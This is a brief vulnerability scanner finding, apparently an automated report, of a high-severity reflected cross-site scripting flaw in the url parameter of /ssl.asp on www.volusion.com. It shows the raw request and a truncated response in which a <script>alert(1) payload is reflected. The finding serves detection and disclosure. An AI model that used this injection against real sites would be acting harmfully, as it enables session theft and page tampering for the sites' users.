1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://www.volusion.com |
Path: | /ssl.asp |
GET /ssl.asp?url=WWW.LINXEDU Host: www.volusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 15:55:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI" X-Powered-By: ASP.NET Content-Length: 1318 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSDBRCB Cache-control: private <html> <head> <title>SSL Security Verification</title> <style type="text/css"> body,td { font-family:Verdana; font-size:12px; } .med { font-family:Arial; font-size:17px; font-weight:bold; } ...[SNIP]... <b>WWW.LINXEDU.COMa2a08<script>alert(1)< ...[SNIP]... |